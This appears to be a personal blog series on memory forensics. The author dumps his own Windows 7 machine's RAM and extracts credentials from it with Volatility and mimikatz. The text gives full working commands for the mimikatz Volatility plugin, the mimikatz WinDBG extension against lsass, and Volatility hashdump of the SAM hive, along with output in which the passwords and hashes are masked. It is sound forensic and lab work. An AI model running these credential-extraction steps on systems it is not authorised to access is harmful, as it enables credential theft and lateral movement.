First things first: The plugins seems to be PoC and supports Windows Vista & 7 with 32 & 64 Bit (Maybe works for Win Server 2008 too?).
Here are the steps for installing volatility with the plugin:
Download & install Python 2.7.x from https://www.python.org/downloads/release
Download & install Microsoft Visual C++ Compiler for Python 2.7 https://www.microsoft.com/en-us/download/details.aspx?id=44266
(Don’t know if that was really neccessary)
C:\Python27\Scripts>python.exe -m pip install distorm3
C:\Python27\Scripts>python.exe -m pip install Pycrypto
C:\Python27\Scripts>python.exe -m pip install yara
C:\Python27\Scripts>python.exe -m pip install construct
I downloaded the mimikatz plugin for volatility from:
and stored it in c:\volatility-plugins.
Check:
C:\>python.exe “c:\Python27\Scripts\vol.py” –plugins=”c:\volatility-plugins” –info | findstr /i mimi
Volatility Foundation Volatility Framework 2.4
linux_slabinfo             – Mimics /proc/slabinfo on a running machine
mimikatz                   – mimikatz offline
Success…
Then copy the test.elf image from part 1 to the vm.
Now it is possible to fetch the credentials in clear text:
C:\>python “c:\python27\scripts\vol.py” –plugins=”c:\volatility-plugins” -f “z:
\DAXAMD-20160124-111555.raw”  –profile=Win7SP0x64 mimikatz
Volatility Foundation Volatility Framework 2.4
Module   User             Domain           Password
——– —————- —————- —————————————-
wdigest  __vmware_user__  daxamd           XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
wdigest  dax              daxamd           XXXXXXXXXXXXXXXXXX
wdigest  DAXAMD$          WORKGROUP

Memdumps, Volatility, Mimikatz, VMs – Part 3: WinDBG Mimikatz Extension

Now this is interesting. It is possible to load a full memory dump into WinDBG, load mimikatz and dump the credentials in cleartext. For this I used the dump of the windows 7 machine from part 2.
For this:
– Download & Install WinDBG
– Download MoonSols Windows Memory Toolkit (http://www.moonsols.com/windows-memory-toolkit/)
Convert the memory image:
C:\Users\dax\Downloads\MWMT-v1.4>bin2dmp.exe ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.dmp
Note: Don’t use the volatility built-in funcion raw2dmp for this task. This did not work for me.
In WinDBG:
– For x64 dump start WinDBG (x64)
– Open the crashdump
Then:
0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  “A La Vie, A L’Amour” – Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ‘## v ##’   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  ‘#####’                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
……………………………………….
Loading User Symbols
…..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
……………..
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
    SessionId: 0  Cid: 01dc    Peb: 7fffffd6000  ParentCid: 0188
    DirBase: 137127000  ObjectTable: fffff8a001159230  HandleCount: 660.
    Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
……………………………………………………….
0: kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 835674 (00000000:000cc05a)
Session           : Interactive from 0
User Name         : __vmware_user__
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:09:33
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00000003] Primary
     * Username : __vmware_user__
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 221616 (00000000:000361b0)
Session           : Interactive from 1
User Name         : dax
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:07:40
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00000003] Primary
     * Username : dax
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : dax
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : dax
     * Domain   : daxamd
     * Password : (null)
— cut —
Again, I found this one awesome.
Links:

Memdumps, Volatility, Mimikatz, VMs – Part 2: Windows 7 Full Memory Dump & Get Hashes

For this part we first make a memory dump with the moonsols dumit.exe tool (using my physical Windows 7 x64 machine):
dumpit0551934099191ca7d24e3bd4552ee139
The next steps are simple volatility calls, like getting the basic image information:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win200
8R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volati
lity_2.5.win.standalone\DAXAMD-20160124-111555.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002ff20f0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002ff3d00L
                KPCR for CPU 1 : 0xfffff880009e8000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-24 11:16:03 UTC+0000
     Image local date and time : 2016-01-24 12:16:03 +0100
Get the hivelist:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw hivelist –profile Win7SP1x64
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a000d55010 0x0000000148258010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000e04200 0x000000013b7ad200 \SystemRoot\System32\Config\DEFAULT
0xfffff8a001219010 0x0000000132d35010 \SystemRoot\System32\Config\SECURITY
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a00143c010 0x000000012fa23010 \??\C:\Windows\ServiceProfiles\NetworkServ
ice\NTUSER.DAT
0xfffff8a00151a240 0x000000012c2b9240 \??\C:\Windows\ServiceProfiles\LocalServic
e\NTUSER.DAT
0xfffff8a002261010 0x000000010db7f010 \??\C:\Users\dax\ntuser.dat
0xfffff8a0022f6410 0x0000000148132410 \??\C:\Users\dax\AppData\Local\Microsoft\W
indows\UsrClass.dat
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.
hve
0xfffff8a00ceae010 0x000000007eeb9010 \??\C:\Windows\System32\config\COMPONENTS
Help!
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.e
xe hashdump -h
Volatility Foundation Volatility Framework 2.5
Usage: Volatility – A memory forensics analysis platform.
Options:
  -h, –help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  –conf-file=.volatilityrc
                        User based configuration file
  -d, –debug           Debug volatility
  –plugins=PLUGINS     Additional plugin directories to use (semi-colon
                        separated)
  –info                Print information about all registered objects
  –cache-directory=C:\Users\dax/.cache\volatility
                        Directory where cache files are stored
  –cache               Use caching
  –tz=TZ               Sets the (Olson) timezone for displaying timestamps
                        using pytz (if installed) or tzset
  -f FILENAME, –filename=FILENAME
                        Filename to use when opening an image
  –profile=WinXPSP2x86
                        Name of the profile to load (use –info to see a list
                        of supported profiles)
  -l LOCATION, –location=LOCATION
                        A URN location from which to load an address space
  -w, –write           Enable write support
  –dtb=DTB             DTB Address
  –shift=SHIFT         Mac KASLR shift address
  –output=text         Output in this format (support is module specific, see
                        the Module Output Options below)
  –output-file=OUTPUT_FILE
                        Write output in this file
  -v, –verbose         Verbose information
  -g KDBG, –kdbg=KDBG  Specify a KDBG virtual address (Note: for 64-bit
                        Windows 8 and above this is the address of
                        KdCopyDataBlock)
  –force               Force utilization of suspect profile
  -k KPCR, –kpcr=KPCR  Specify a specific KPCR address
  –cookie=COOKIE       Specify the address of nt!ObHeaderCookie (valid for
                        Windows 10 only)
  -y SYS_OFFSET, –sys-offset=SYS_OFFSET
                        SYSTEM hive offset (virtual)
  -s SAM_OFFSET, –sam-offset=SAM_OFFSET
                        SAM hive offset (virtual)
Module Output Options: dot, greptext, html, json, sqlite, text, xlsx
———————————
Module HashDump
———————————
Dumps passwords hashes (LM/NTLM) from memory
What we need for getting the hashes:
y=virtual location of system
s=virtual location of sam
Dump the hashes:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f DAXAMD-20160124-111555.raw –profile Win7SP1x64 -y 0xfffff8a0000231f0 -s 0xfffff8a001290010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
HomeGroupUser$:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
otto:1007:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
__vmware_user__:1015:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
UpdatusUser:1016:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Link: